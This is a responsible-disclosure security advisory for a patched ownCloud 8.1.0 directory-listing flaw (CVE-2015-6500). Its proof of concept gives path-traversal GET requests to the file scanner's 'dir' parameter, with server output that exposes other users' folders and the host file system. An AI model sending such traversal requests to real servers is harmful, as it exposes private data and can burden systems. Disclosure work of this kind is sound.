-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-048 Product: ownCloud Vendor: ownCloud Inc., Community Affected Version(s): 8.1.0 Tested Version(s): 8.1.0 Vulnerability Type: Information Exposure Through Directory Listing (CWE-548) Risk Level: Low Solution Status: Fixed Vendor Notification: 2015-07-24 Solution Date: 2015-08-11 Public Disclosure: 2015-08-25 CVE Reference: CVE-2015-6500 Author of Advisory: Martin Macht (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: ownCloud is a software suite for creating and using file hosting services. The ownCloud Web site describes the software as follows (see [1]): "ownCloud is a self-hosted file sync and share server. It provides access to your data through a web interface, sync clients or WebDAV while providing a platform to view, sync and share across devices easily - all under your control. ownCloud's open architecture is extensible via a simple but powerful API for applications and plugins and it works with any storage."" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: ownCloud is vulnerable to information exposure through directory listing. It is possible with a normal user to get information about the complete directory structure of the underlying file system. The 'dir' parameter in the script (index.php/apps/files/ajax/scan.php) which indexes the user's files can easily be manipulated. This vulnerability can potentially be used for denial-of-service attacks if the selected directory is deep enough, because to index many directories requires high computational effort. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): With the following HTTP GET request, it is possible to see the directories of other users. https:///index.php/apps/files/ajax/scan.php?force=true&dir=../../../&requesttoken= Server response (shortened): vent: user data: "test" [...] event: folder data: "\/test\/..\/\/test\/files_external" event: folder data: "\/test\/..\/\/test\/files_external\/uploads" event: folder data: "\/test\/..\/\/test\/cache" event: folder data: "\/test\/..\/\/test\/files" event: folder data: "\/test\/..\/\/test\/files\/Photos" event: folder data: "\/test\/..\/\/test\/files\/Documents" event: folder data: "\/test\/..\/\/updater_backup" [...] event: folder data: "\/test\/..\/\/user\/cache" event: folder data: "\/test\/..\/\/user\/files" event: folder data: "\/test\/..\/\/user\/files\/Photos" event: folder data: "\/test\/..\/\/user\/files\/Documents" event: folder data: "\/test\/..\/\/.locks" event: done data: 83 event: __internal__ data: "close" Is the directory chosen deep enough, the entire directory structure of the underlying system can be read. https:///index.php/apps/files/ajax/scan.php?force=true&dir=../../../../../../../../&requesttoken= Server response (shortened): [...] data: "\/test\/..\/..\/..\/..\/..\/..\/\/usr\/src\/linux-headers-3.13.0-55\/drivers\/mmc\/core" event: folder data: "\/test\/..\/..\/..\/..\/..\/..\/\/usr\/src\/linux-headers-3.13.0-55\/drivers\/mmc\/host" event: folder data: "\/test\/..\/..\/..\/..\/..\/..\/\/usr\/src\/linux-headers-3.13.0-55\/drivers\/mmc\/card" event: folder data: "\/test\/..\/..\/..\/..\/..\/..\/\/usr\/src\/linux-headers-3.13.0-55\/drivers\/nfc" [...] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2015-07-24: Vulnerability reported to vendor 2015-08-11: Vendor releases fix for the described security vulnerability 2015-08-25: Release of the ownCloud Security Advisorie oc-sa-2015-014 [2] 2015-08-25: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] ownCloud, Web Site https://owncloud.org/ [2] ownCloud, oc-sa-2015-014: Information Exposure Through Directory Listing in the file scanner https://owncloud.org/security/advisory/?id=oc-sa-2015-014 [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Martin Macht of the SySS GmbH. E-Mail: martin.macht (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Martin_Macht.asc Key fingerprint = 8B1A 1E97 1EF4 F0EA 50F8 428E ED1B F609 D44A 8C87 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJV2xquAAoJEO0b9gnUSoyHsB4P/R09hxWvFLL0rD0i2o3rQGdC 0/sPjjVhdjxOCZnfBjG6bc88hD/yuRv1LQg62ZcCf+5vrjnmJwPhlKFe01ZvfK1e lGRkGz9kIEakXY9YWvdwdJnTE0uvOcYxTu7FtYVAZPWjZEYjZJwVJrXBvpKPJUZm ZxurjfmiK7rMYPm9f3JshjCUF6ziDdHS83CrvibliMu336oDXkJv+8HMPhMy+Pb0 d+oyD9a21w8uLBuhw865bGcqNPKAVLgcymvv1/QYfeHLKM5UZ2U65Gj7of8bZMZT bfDHkrz0ZGAsOZ7kjNxAwBQc9D5UFLzE7Xu9vxpLoXa2irPj9KVFu21bX9cIvnhC fCLsHLuF59lIpgp2pcWsSatXdo0HZ582k1h6ws9eBGlPrvax/7ViL/QOYG0MHEZB PfBywC6wFsV6cFv0m02BzcTCOu8rv+O4HoqHNRvp7tyYeY5Hci/P3j6iJ/nxcFqf Nv/Rx4dEsAMegWYyXe+EgJTk1/1rWQR7nFxD035T+VidaaE0r1shHQ7Hc/a0Cj4k 6xyjp9lGEjw0Eo9GsvYSSxBqsIAA+psnBiXtOBSxuI2Th+xanPtBjvXaO1u/6tkL cdSaz2YOZeNWVToWFmZqD2w6SImoJKUb/rX3QfQgvFHvkDY+IEzbswsRKaYViqeJ FtYkmTQgJTJHtDteAuOv =Fwqc -----END PGP SIGNATURE-----